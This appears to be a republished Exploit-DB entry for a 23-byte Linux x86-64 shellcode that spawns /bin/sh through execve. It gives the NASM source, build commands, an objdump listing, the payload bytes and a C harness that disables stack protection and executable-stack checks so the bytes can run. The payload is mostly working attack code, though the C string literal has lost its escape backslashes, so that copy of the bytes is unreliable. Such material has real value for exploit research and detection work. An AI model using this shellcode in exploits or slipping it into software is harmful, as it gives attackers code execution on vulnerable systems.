
Published on May 27th, 2019 📆 | 7001 Views ⚑


Linux/x64 – Execve(/bin/sh) Shellcode (23 bytes)



/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: rajvardhan
;Date: 23/05/2019
;Architecture: Linux x86_64
;Possibly The Smallest And Fully Reliable Shellcode

===========
Asm Source  
===========

; Syntax: NASM (Intel operand order). Target: Linux x86-64 raw syscall ABI
; (rax = syscall number, rdi/rsi/rdx = first three arguments).
; Effect: execve("/bin//sh", NULL, NULL). Only a .text section is used; the
; path string is built on the stack at run time.
; NULL argv/envp is a Linux-specific allowance and is not portable.
; For defenders: the assembled bytes (see the disassembly below) contain the
; literal 2f 62 69 6e 2f 2f 73 68 ("/bin//sh") and end in 0f 05 (syscall),
; which makes this exact sequence easy to match statically.
global _start
section .text
_start:
	xor rsi,rsi			; rsi = 0 -> argv = NULL (2nd syscall argument)
	push rsi			; zero qword on the stack; acts as the path's NUL terminator
	mov rdi,0x68732f2f6e69622f	; little-endian bytes of "/bin//sh"; the doubled slash pads the path to 8 bytes
	push rdi			; stack top now holds "/bin//sh" followed by the zero qword
	push rsp			; push the address of that string ...
	pop rdi				; ... rdi = pointer to the path (1st syscall argument)
	push 59				; 59 = execve on Linux x86-64
	pop rax				; rax = 59 (syscall number)
	cdq				; edx = sign of eax = 0; the 32-bit write also clears upper rdx -> envp = NULL
	syscall				; execve(rdi, rsi, rdx); no code follows, so a failed call runs into whatever bytes come next
================================
Instructions for nasm compilation
================================

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode

===================
objdump disassembly
===================

Disassembly of section .text:

0000000000401000 <_start>:
  401000:	48 31 f6             	xor    %rsi,%rsi
  401003:	56                   	push   %rsi
  401004:	48 bf 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rdi
  40100b:	2f 73 68 
  40100e:	57                   	push   %rdi
  40100f:	54                   	push   %rsp
  401010:	5f                   	pop    %rdi
  401011:	6a 3b                	pushq  $0x3b
  401013:	58                   	pop    %rax
  401014:	99                   	cltd   
  401015:	0f 05                	syscall 

==================
23 Bytes Shellcode
==================

x48x31xf6x56x48xbfx2fx62x69x6ex2fx2fx73x68x57x54x5fx6ax3bx58x99x0fx05

======================
C Compilation And Test
======================

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

*/

#include 

/*
 * Byte string meant to hold the 23-byte payload shown in the objdump
 * disassembly in the header comment.
 * NOTE(review): as shown here the literal contains no backslashes, so a
 * compiler sees plain ASCII text ("x48x31...") rather than those 23 bytes;
 * the escape prefixes appear to have been lost when the page was extracted.
 * Because it is a string literal, the array also carries a trailing NUL byte.
 */
unsigned char shellcode[] = 
"x48x31xf6x56x48xbfx2fx62x69x6ex2fx2fx73x68x57x54x5fx6ax3bx58x99x0fx05";
/*
 * Test harness: reinterprets the global `shellcode` array as a function and
 * calls it.
 *
 * Converting a data pointer to a function pointer is outside what ISO C
 * defines, and the call only succeeds if the memory holding the array is
 * mapped executable. The build line in the header comment passes
 * `-z execstack` to relax that protection. The array is a global rather than
 * a stack object, so whether the flag is sufficient presumably depends on the
 * kernel and toolchain (verify on the target system). Where non-executable
 * data pages (NX) are enforced, the call faults instead of running the bytes,
 * which is the mitigation this harness has to switch off.
 * Build and run it only in an isolated lab environment.
 */
int main()
{
    typedef int (*entry_fn)();
    entry_fn entry = (entry_fn)shellcode;

    entry();
}
            





https://www.exploit-db.com/exploits/46907
